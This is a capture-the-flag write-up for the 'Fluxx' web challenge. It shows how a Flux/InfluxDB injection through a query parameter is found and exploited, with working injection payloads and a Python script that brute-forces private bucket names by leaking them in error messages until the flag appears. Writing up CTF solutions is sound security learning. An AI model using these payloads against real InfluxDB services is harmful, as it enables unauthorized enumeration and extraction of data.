Tags: web nosqli
# Fluxx
## Description
Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data.I used a database which is designed for handling high volumes of timestamped data.
But I think its vulnerable find it and get he flag.
To be noted: The challenge resets after sometime. So please wait for a while if you see any error.
## Writeup
Visiting the website I got some interesting response.
Please visit /query?data= to travel with time.
For efficiency reasons I made a python script to send my payload.
import requests
base_URL = ''
data = '1" OR 1=1--'
req = requests.get(f'{base_URL}query?data={data}')
Executing this gives me an interesting response.
kali@kali python3 ./solve.py
HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF
error @1:152-1:153: invalid expression @1:151-1:152: =
error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF
Looking up the error I found that it was a response from `InfluxDB`.
Knowing that I looked up `NoSQL-Injection` for InfluxDB where I found a good [Website](https://rafa.hashnode.dev/influxdb-nosql-injection).
There I found the query below which is able to enumerate private buckets.
") |> yield(name: "1337")
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name))
Having this I wrote a python script to bruteforce every private bucket possible.
import requests, urllib.parse
base_URL = ''
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for char in list(letters):
payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'
encoded_payload = urllib.parse.quote(payload, safe='')
req = requests.get(f'{base_URL}query?data={encoded_payload}')
if req.text != '[]':
Executing this I was able to obtain the flag which concludes this writeup.
kali@kali python3 ./solve.py
HttpError: runtime error @2:14-2:69: filter: failed to evaluate filter function: KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}